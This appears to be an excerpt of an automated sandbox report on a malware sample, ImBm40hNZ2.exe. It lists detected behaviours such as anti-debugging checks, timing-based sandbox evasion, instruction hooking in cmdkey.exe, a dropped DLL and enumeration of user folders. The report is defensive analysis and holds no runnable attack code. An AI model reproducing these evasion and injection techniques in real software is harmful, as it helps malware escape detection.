        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        Source: C:\Users\user\Desktop\ImBm40hNZ2.exe API/Special instruction interceptor: Address: 37411BF
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exe API/Special instruction interceptor: Address: 25211BF
        Source: C:\Windows\SysWOW64\cmdkey.exe API/Special instruction interceptor: Address: 7FF81028D144
        Source: C:\Windows\SysWOW64\cmdkey.exe API/Special instruction interceptor: Address: 7FF81028D604
        Source: C:\Windows\SysWOW64\cmdkey.exe API/Special instruction interceptor: Address: 7FF81028D764
        Source: C:\Windows\SysWOW64\cmdkey.exe API/Special instruction interceptor: Address: 7FF81028D324
        Source: C:\Windows\SysWOW64\cmdkey.exe API/Special instruction interceptor: Address: 7FF81028D364
        Source: C:\Windows\SysWOW64\cmdkey.exe API/Special instruction interceptor: Address: 7FF81028D004
        Source: C:\Windows\SysWOW64\cmdkey.exe API/Special instruction interceptor: Address: 7FF81028FF74
        Source: C:\Windows\SysWOW64\cmdkey.exe API/Special instruction interceptor: Address: 7FF81028D864
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exe Code function: 3_2_33941763 rdtsc 3_2_33941763
        Source: C:\Windows\SysWOW64\cmdkey.exe Window / User API: threadDelayed 9038
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsy1C7B.tmp\System.dll
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exe API coverage: 0.2 %
        Source: C:\Windows\SysWOW64\cmdkey.exe API coverage: 3.1 %
        Source: C:\Windows\SysWOW64\cmdkey.exe TID: 1976 Thread sleep count: 121 > 30
        Source: C:\Windows\SysWOW64\cmdkey.exe TID: 1976 Thread sleep time: -242000s >= -30000s
        Source: C:\Windows\SysWOW64\cmdkey.exe TID: 1976 Thread sleep count: 9038 > 30
        Source: C:\Windows\SysWOW64\cmdkey.exe TID: 1976 Thread sleep time: -18076000s >= -30000s
        Source: C:\Windows\SysWOW64\cmdkey.exe Last function: Thread delayed
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exe Code function: 0_2_00402645 FindFirstFileA,0_2_00402645
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exe Code function: 0_2_00405451 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405451
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exe Code function: 0_2_00405E95 FindFirstFileA,FindClose,0_2_00405E95
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exe Code function: 3_2_00402645 FindFirstFileA,3_2_00402645
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exe Code function: 3_2_00405451 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,3_2_00405451
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exe Code function: 3_2_00405E95 FindFirstFileA,FindClose,3_2_00405E95
        Source: C:\Windows\SysWOW64\cmdkey.exe Code function: 5_2_0301C710 FindFirstFileW,FindNextFileW,FindClose,5_2_0301C710
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exe File opened: C:\Users\user
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exe File opened: C:\Users\user\AppData
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exe File opened: C:\Users\user\AppData\Roaming
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
        Source: aypAdCUEzlG.exe, 00000006.00000002.21524645275.00000000011FF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll7
        Source: ImBm40hNZ2.exe, 00000003.00000003.17166330810.00000000031A8000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000002.17212781148.0000000003148000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000002.17213048209.00000000031A8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
        Source: cmdkey.exe, 00000005.00000002.21523901420.00000000030ED000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: firefox.exe, 00000007.00000002.17499732783.000001BA8D766000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllWW
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exe API call chain: ExitProcess graph end node graph_0-3738
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exe API call chain: ExitProcess graph end node graph_0-3895
        Source: C:\Windows\SysWOW64\cmdkey.exe Process information queried: ProcessInformation
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exe Process queried: DebugPort
        Source: C:\Windows\SysWOW64\cmdkey.exe Process queried: DebugPort
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exe Code function: 3_2_33941763 rdtsc 3_2_33941763
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exe Code function: 0_2_0040231C RegCreateKeyExA,lstrlenA,LdrInitializeThunk,RegSetValueExA,RegCloseKey,0_2_0040231C
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exe Code function: 0_2_00405EBC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405EBC
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exe Code function: 3_2_3392A390 mov eax, dword ptr fs:[00000030h] 3_2_3392A390
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33930118 mov eax, dword ptr fs:[00000030h]3_2_33930118
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338FF113 mov eax, dword ptr fs:[00000030h]3_2_338FF113
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338FF113 mov eax, dword ptr fs:[00000030h]3_2_338FF113
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338FF113 mov eax, dword ptr fs:[00000030h]3_2_338FF113
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338FF113 mov eax, dword ptr fs:[00000030h]3_2_338FF113
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338FF113 mov eax, dword ptr fs:[00000030h]3_2_338FF113
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338FF113 mov eax, dword ptr fs:[00000030h]3_2_338FF113
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338FF113 mov eax, dword ptr fs:[00000030h]3_2_338FF113
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338FF113 mov eax, dword ptr fs:[00000030h]3_2_338FF113
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338FF113 mov eax, dword ptr fs:[00000030h]3_2_338FF113
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338FF113 mov eax, dword ptr fs:[00000030h]3_2_338FF113
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338FF113 mov eax, dword ptr fs:[00000030h]3_2_338FF113
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338FF113 mov eax, dword ptr fs:[00000030h]3_2_338FF113
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338FF113 mov eax, dword ptr fs:[00000030h]3_2_338FF113
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338FF113 mov eax, dword ptr fs:[00000030h]3_2_338FF113
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338FF113 mov eax, dword ptr fs:[00000030h]3_2_338FF113
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338FF113 mov eax, dword ptr fs:[00000030h]3_2_338FF113
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338FF113 mov eax, dword ptr fs:[00000030h]3_2_338FF113
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338FF113 mov eax, dword ptr fs:[00000030h]3_2_338FF113
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338FF113 mov eax, dword ptr fs:[00000030h]3_2_338FF113
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338FF113 mov eax, dword ptr fs:[00000030h]3_2_338FF113
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338FF113 mov eax, dword ptr fs:[00000030h]3_2_338FF113
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3392510F mov eax, dword ptr fs:[00000030h]3_2_3392510F
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3392510F mov eax, dword ptr fs:[00000030h]3_2_3392510F
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3392510F mov eax, dword ptr fs:[00000030h]3_2_3392510F
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3392510F mov eax, dword ptr fs:[00000030h]3_2_3392510F
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3392510F mov eax, dword ptr fs:[00000030h]3_2_3392510F
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3392510F mov eax, dword ptr fs:[00000030h]3_2_3392510F
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3392510F mov eax, dword ptr fs:[00000030h]3_2_3392510F
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3392510F mov eax, dword ptr fs:[00000030h]3_2_3392510F
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3392510F mov eax, dword ptr fs:[00000030h]3_2_3392510F
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3392510F mov eax, dword ptr fs:[00000030h]3_2_3392510F
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3392510F mov eax, dword ptr fs:[00000030h]3_2_3392510F
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3392510F mov eax, dword ptr fs:[00000030h]3_2_3392510F
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3392510F mov eax, dword ptr fs:[00000030h]3_2_3392510F
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3390510D mov eax, dword ptr fs:[00000030h]3_2_3390510D
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339BF13E mov eax, dword ptr fs:[00000030h]3_2_339BF13E
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3398A130 mov eax, dword ptr fs:[00000030h]3_2_3398A130
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33937128 mov eax, dword ptr fs:[00000030h]3_2_33937128
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33937128 mov eax, dword ptr fs:[00000030h]3_2_33937128
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338FA147 mov eax, dword ptr fs:[00000030h]3_2_338FA147
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338FA147 mov eax, dword ptr fs:[00000030h]3_2_338FA147
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338FA147 mov eax, dword ptr fs:[00000030h]3_2_338FA147
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339D3157 mov eax, dword ptr fs:[00000030h]3_2_339D3157
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339D3157 mov eax, dword ptr fs:[00000030h]3_2_339D3157
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339D3157 mov eax, dword ptr fs:[00000030h]3_2_339D3157
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3393415F mov eax, dword ptr fs:[00000030h]3_2_3393415F
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3399314A mov eax, dword ptr fs:[00000030h]3_2_3399314A
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3399314A mov eax, dword ptr fs:[00000030h]3_2_3399314A
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3399314A mov eax, dword ptr fs:[00000030h]3_2_3399314A
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3399314A mov eax, dword ptr fs:[00000030h]3_2_3399314A
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339D5149 mov eax, dword ptr fs:[00000030h]3_2_339D5149
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33906179 mov eax, dword ptr fs:[00000030h]3_2_33906179
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3395717A mov eax, dword ptr fs:[00000030h]3_2_3395717A
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3395717A mov eax, dword ptr fs:[00000030h]3_2_3395717A
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3393716D mov eax, dword ptr fs:[00000030h]3_2_3393716D
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338FA093 mov ecx, dword ptr fs:[00000030h]3_2_338FA093
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339D4080 mov eax, dword ptr fs:[00000030h]3_2_339D4080
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339D4080 mov eax, dword ptr fs:[00000030h]3_2_339D4080
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339D4080 mov eax, dword ptr fs:[00000030h]3_2_339D4080
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339D4080 mov eax, dword ptr fs:[00000030h]3_2_339D4080
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339D4080 mov eax, dword ptr fs:[00000030h]3_2_339D4080
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339D4080 mov eax, dword ptr fs:[00000030h]3_2_339D4080
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339D4080 mov eax, dword ptr fs:[00000030h]3_2_339D4080
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338FC090 mov eax, dword ptr fs:[00000030h]3_2_338FC090
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339D50B7 mov eax, dword ptr fs:[00000030h]3_2_339D50B7
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339400A5 mov eax, dword ptr fs:[00000030h]3_2_339400A5
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339BB0AF mov eax, dword ptr fs:[00000030h]3_2_339BB0AF
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339AF0A5 mov eax, dword ptr fs:[00000030h]3_2_339AF0A5
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339AF0A5 mov eax, dword ptr fs:[00000030h]3_2_339AF0A5
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339AF0A5 mov eax, dword ptr fs:[00000030h]3_2_339AF0A5
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339AF0A5 mov eax, dword ptr fs:[00000030h]3_2_339AF0A5
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339AF0A5 mov eax, dword ptr fs:[00000030h]3_2_339AF0A5
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339AF0A5 mov eax, dword ptr fs:[00000030h]3_2_339AF0A5
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339AF0A5 mov eax, dword ptr fs:[00000030h]3_2_339AF0A5
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3391B0D0 mov eax, dword ptr fs:[00000030h]3_2_3391B0D0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338FB0D6 mov eax, dword ptr fs:[00000030h]3_2_338FB0D6
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338FB0D6 mov eax, dword ptr fs:[00000030h]3_2_338FB0D6
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338FB0D6 mov eax, dword ptr fs:[00000030h]3_2_338FB0D6
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338FB0D6 mov eax, dword ptr fs:[00000030h]3_2_338FB0D6
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3393D0F0 mov eax, dword ptr fs:[00000030h]3_2_3393D0F0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3393D0F0 mov ecx, dword ptr fs:[00000030h]3_2_3393D0F0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338F90F8 mov eax, dword ptr fs:[00000030h]3_2_338F90F8
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338F90F8 mov eax, dword ptr fs:[00000030h]3_2_338F90F8
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338F90F8 mov eax, dword ptr fs:[00000030h]3_2_338F90F8
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338F90F8 mov eax, dword ptr fs:[00000030h]3_2_338F90F8
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338FC0F6 mov eax, dword ptr fs:[00000030h]3_2_338FC0F6
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33942010 mov ecx, dword ptr fs:[00000030h]3_2_33942010
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33925004 mov eax, dword ptr fs:[00000030h]3_2_33925004
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33925004 mov ecx, dword ptr fs:[00000030h]3_2_33925004
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33908009 mov eax, dword ptr fs:[00000030h]3_2_33908009
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338FD02D mov eax, dword ptr fs:[00000030h]3_2_338FD02D
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33901051 mov eax, dword ptr fs:[00000030h]3_2_33901051
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33901051 mov eax, dword ptr fs:[00000030h]3_2_33901051
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339D505B mov eax, dword ptr fs:[00000030h]3_2_339D505B
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33930044 mov eax, dword ptr fs:[00000030h]3_2_33930044
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33907072 mov eax, dword ptr fs:[00000030h]3_2_33907072
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33906074 mov eax, dword ptr fs:[00000030h]3_2_33906074
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33906074 mov eax, dword ptr fs:[00000030h]3_2_33906074
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339A9060 mov eax, dword ptr fs:[00000030h]3_2_339A9060
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33931796 mov eax, dword ptr fs:[00000030h]3_2_33931796
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33931796 mov eax, dword ptr fs:[00000030h]3_2_33931796
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3397E79D mov eax, dword ptr fs:[00000030h]3_2_3397E79D
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3397E79D mov eax, dword ptr fs:[00000030h]3_2_3397E79D
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3397E79D mov eax, dword ptr fs:[00000030h]3_2_3397E79D
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3397E79D mov eax, dword ptr fs:[00000030h]3_2_3397E79D
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3397E79D mov eax, dword ptr fs:[00000030h]3_2_3397E79D
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3397E79D mov eax, dword ptr fs:[00000030h]3_2_3397E79D
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3397E79D mov eax, dword ptr fs:[00000030h]3_2_3397E79D
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3397E79D mov eax, dword ptr fs:[00000030h]3_2_3397E79D
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3397E79D mov eax, dword ptr fs:[00000030h]3_2_3397E79D
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339DB781 mov eax, dword ptr fs:[00000030h]3_2_339DB781
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339DB781 mov eax, dword ptr fs:[00000030h]3_2_339DB781
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339D17BC mov eax, dword ptr fs:[00000030h]3_2_339D17BC
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339007A7 mov eax, dword ptr fs:[00000030h]3_2_339007A7
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339CD7A7 mov eax, dword ptr fs:[00000030h]3_2_339CD7A7
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339CD7A7 mov eax, dword ptr fs:[00000030h]3_2_339CD7A7
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339CD7A7 mov eax, dword ptr fs:[00000030h]3_2_339CD7A7
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339BF7CF mov eax, dword ptr fs:[00000030h]3_2_339BF7CF
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339077F9 mov eax, dword ptr fs:[00000030h]3_2_339077F9
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339077F9 mov eax, dword ptr fs:[00000030h]3_2_339077F9
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3392E7E0 mov eax, dword ptr fs:[00000030h]3_2_3392E7E0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339037E4 mov eax, dword ptr fs:[00000030h]3_2_339037E4
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339037E4 mov eax, dword ptr fs:[00000030h]3_2_339037E4
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339037E4 mov eax, dword ptr fs:[00000030h]3_2_339037E4
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339037E4 mov eax, dword ptr fs:[00000030h]3_2_339037E4
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339037E4 mov eax, dword ptr fs:[00000030h]3_2_339037E4
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339037E4 mov eax, dword ptr fs:[00000030h]3_2_339037E4
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339037E4 mov eax, dword ptr fs:[00000030h]3_2_339037E4
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338FB705 mov eax, dword ptr fs:[00000030h]3_2_338FB705
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338FB705 mov eax, dword ptr fs:[00000030h]3_2_338FB705
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338FB705 mov eax, dword ptr fs:[00000030h]3_2_338FB705
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338FB705 mov eax, dword ptr fs:[00000030h]3_2_338FB705
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3390471B mov eax, dword ptr fs:[00000030h]3_2_3390471B
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3390471B mov eax, dword ptr fs:[00000030h]3_2_3390471B
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339BF717 mov eax, dword ptr fs:[00000030h]3_2_339BF717
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3390D700 mov ecx, dword ptr fs:[00000030h]3_2_3390D700
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339C970B mov eax, dword ptr fs:[00000030h]3_2_339C970B
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339C970B mov eax, dword ptr fs:[00000030h]3_2_339C970B
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3392270D mov eax, dword ptr fs:[00000030h]3_2_3392270D
